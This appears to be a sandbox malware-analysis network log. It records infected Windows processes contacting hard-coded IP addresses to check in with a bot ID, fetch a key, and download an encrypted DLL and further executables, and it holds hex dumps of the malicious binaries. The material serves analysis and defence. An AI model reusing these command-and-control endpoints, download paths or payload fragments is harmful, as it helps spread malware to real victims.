ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 79 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELyWg""w@0@@@d\|@gu4@.text `.rdata@@.datalpH@.rsrcg@h@@.relocuv\@B
Dec 10, 2024 00:43:45.126399994 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
Dec 10, 2024 00:43:45.126410007 CET	1236	IN	Data Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59 Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
Dec 10, 2024 00:43:45.126415968 CET	1236	IN	Data Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 Data Ascii: OO_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
Dec 10, 2024 00:43:45.126419067 CET	248	IN	Data Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
Dec 10, 2024 00:43:45.126430035 CET	1236	IN	Data Raw: 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c 89 51 08 88 51 10 89 51 Data Ascii: uWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$\|I IF^jAZ @uSV5I3WjXSG
Dec 10, 2024 00:43:45.126435041 CET	1236	IN	Data Raw: 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 03 74 0d 48 83 e8 01 0f 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d Data Ascii: At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4
Dec 10, 2024 00:43:45.126442909 CET	248	IN	Data Raw: 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d ec 8d 8d 54 ff ff ff 50 47 e8 5a 03 00 00 8b 45 d8 8b 48 04 8b 85 58 ff ff ff 89 45 bc e9 a6 fe ff ff 83 e8 21 0f 85 23 01 00 00 8b 41 04 6a 7f Data Ascii: ;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE
Dec 10, 2024 00:43:45.126782894 CET	1236	IN	Data Raw: 00 3b fb 0f 84 31 fd ff ff e9 85 04 04 00 ff 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53 e8 86 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 Data Ascii: ;1uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG\|EIE
Dec 10, 2024 00:43:45.126796007 CET	1236	IN	Data Raw: 00 88 5c 24 19 88 5c 24 1a ff 15 28 c3 49 00 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00 85 c0 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 Data Ascii: \$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M
Dec 10, 2024 00:43:45.247164011 CET	1236	IN	Data Raw: 4d e0 e8 6c a0 00 00 8b 75 ac 8d 4d f0 e8 22 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57 68 58 ca 49 00 e8 cf 1a 02 00 59 59 85 c0 0f 84 8b fd 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 Data Ascii: MluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49887	80.82.65.70	80	2300	C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:46.098083019 CET	412	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:47.468934059 CET	204	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:47 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:43:47.527775049 CET	386	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:48.065232992 CET	224	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:47 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 10, 2024 00:43:48.077747107 CET	391	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:48.643695116 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:48 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 10, 2024 00:43:48.643793106 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 10, 2024 00:43:48.643809080 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 10, 2024 00:43:48.644021988 CET	672	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Dec 10, 2024 00:43:48.644032955 CET	1236	IN	Data Raw: 5a 4e 90 47 87 8d 31 4d 04 f3 b2 8f b5 ec 0b 34 86 f5 8a 59 cc e1 31 db ef 09 6f 5f de 50 ce 55 7c bf 37 d2 26 b8 77 5e 1f 27 ab 58 1f ee ce 9b bf 8d 85 b2 80 b7 5a 06 25 9d b3 27 1c c8 e3 6c 36 e5 a3 7d 22 17 b3 13 00 d6 07 77 28 09 24 fc 89 30 Data Ascii: ZNG1M4Y1o_PU\|7&w^'XZ%'l6}"w($0_g8^T1bf4n\vl)OCoKaC#/\|fZyhc7LY=T(b8be@yo~YN_ozIe_*%BH1uObUR\|aXyt
Dec 10, 2024 00:43:48.644052982 CET	1236	IN	Data Raw: c0 da 67 42 4f 24 35 da 00 c2 9f 29 69 11 0c 49 94 a6 a7 92 c3 e7 14 45 de 79 b3 d8 e2 24 85 e6 7e c2 2a ec 32 fa 5b b8 db e4 ea 7c 97 4e cb e1 cc b0 1d f4 fb a3 05 75 fa 46 d0 b4 ab dc eb 81 ad f1 f2 0d 38 68 4a c0 b6 50 cd d7 bc 1f fb 5d 2b cf Data Ascii: gBO$5)iIEy$~*2[\|NuF8hJP]+P\|;3a__JnSgph=jkKOT3e13USC'{XJdey_ p[P<M%5:,rFTgYIR)"<N3ei-IQvtB
Dec 10, 2024 00:43:48.644062996 CET	1236	IN	Data Raw: ed f5 bb 67 1c b0 2e 96 1b 41 e2 4b e0 d0 c0 32 d7 54 d0 57 51 be 23 33 85 40 1d 3e 06 84 94 eb 5a 77 62 51 fd 8a 8b fe 9b 5e 14 3c 3b b6 5d 0d 8f 18 29 53 7a e3 4a 54 9e 1e 8f c8 d7 2e 61 9b 87 bb e4 ef bd c8 ac 33 94 fa df 50 e0 e1 f7 4e ef 39 Data Ascii: g.AK2TWQ#3@>ZwbQ^<;])SzJT.a3PN9Yn(X"h!rrn~O+;}?jjo-?1RXUC\|B\n2/}=.H,/Ta@IEh8\|[cbNVNzcY".n$GA
Dec 10, 2024 00:43:48.644085884 CET	1236	IN	Data Raw: 1a 2a 62 b4 ae 8a 5b 82 f2 2e 8d 4c f7 bc 4a 54 d2 2f 9c 5e d2 78 32 e3 23 07 42 8b dd c1 ad 98 37 2e 4a db d1 95 b9 bb 1a f0 cf e7 16 4b fc ec 93 ab e6 08 7e 4b 49 dc 0d 53 c5 8e 5f f2 c2 11 55 dc 53 1e 24 d4 8f 7e fa 25 60 68 8f b2 67 bd 27 d8 Data Ascii: b[.LJT/^x2#B7.JK~KIS_US$~%`hg'?CW[MQHSB-v0< c\tMc[T4Auxxc+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&
Dec 10, 2024 00:43:48.652333975 CET	1236	IN	Data Raw: 40 1b 4a eb 32 76 5f d3 fb 39 60 50 11 2c ac 7f 75 d5 41 17 9a ba 9a a5 65 e4 39 e7 ee 7b 3f e7 8d d7 54 c2 a5 72 c0 54 8a a5 b2 41 0c fc b8 f8 a6 99 6c 72 12 a8 98 67 28 3b fc fc c1 a9 30 6d fe 11 b8 f9 56 53 85 81 29 cb 26 d1 c8 94 83 58 a5 3c Data Ascii: @J2v_9`P,uAe9{?TrTAlrg(;0mVS)&X<V\/Z~_Jp;JOU6VQ9_n-\jsk7rixa#vyC\<7ws583v=w,"Zf`>]6%""4Y8}p+[a
Dec 10, 2024 00:43:48.652539968 CET	1236	IN	Data Raw: 2b 67 00 6f 36 93 8b 8f 53 25 a3 ee f6 cc 1a d2 6d 3a a3 c7 1f 80 c8 43 65 da 7d 01 a3 c8 c6 08 e5 c2 f8 af 3d 9e 77 c1 ae 46 51 3f 02 02 8d 16 23 36 00 5e 2a 1d fc e1 36 a7 cc 4b 30 26 1d 8f 5f 45 f5 89 69 ff aa 98 7d 6d 1c a5 a0 d0 73 f1 10 df Data Ascii: +go6S%m:Ce}=wFQ?#6^6K0&_Ei}ms' 0u't0h[9wBN:DGT;^WbIYzFs=fu.itu C{`94gkda6U#VoTT<{T
Dec 10, 2024 00:43:48.660856962 CET	1236	IN	Data Raw: 63 18 c8 72 df a1 6f 49 6a f7 b6 ad 79 a5 cb 10 f5 ba e2 81 be e8 98 eb cc 6a 47 b3 45 85 09 0a 51 41 d8 51 2e bf 8c e7 c3 62 33 e4 7a bc 48 a7 e3 3b ff 37 5b c4 d6 52 a2 3f 62 26 3d 5a 7d cc 42 14 fd 13 48 12 28 2d 1e bf 75 4b 44 6e 94 56 05 63 Data Ascii: croIjyjGEQAQ.b3zH;7[R?b&=Z}BH(-uKDnVc]F?`(&z=eSO'gu)#=~Dr?_Ekx yCS<0k{)QtDuuM5:1hJ5A\*3x>olqm%
Dec 10, 2024 00:43:49.241883993 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:49.744008064 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:49 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:43:51.852150917 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:52.347733021 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:52 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:43:54.377856016 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:54.872570038 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:54 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:43:56.904119968 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:57.395554066 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:57 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:43:59.430638075 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:00.034813881 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:59 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:02.072838068 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:02.567837000 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:02 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:04.708821058 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:05.216063976 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:04 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:07.247211933 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:07.738622904 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:07 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:09.766979933 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:10.256716967 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:09 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:12.305177927 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:12.791740894 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:12 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:15.072442055 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:15.565103054 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:15 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49900	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:49.514508963 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013558001&unit=246122658369
Dec 10, 2024 00:43:50.844208002 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49903	185.215.113.16	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:50.968508959 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 00:43:52.328145981 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:51 GMT Content-Type: application/octet-stream Content-Length: 2841600 Last-Modified: Mon, 09 Dec 2024 23:14:28 GMT Connection: keep-alive ETag: "675779d4-2b5c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 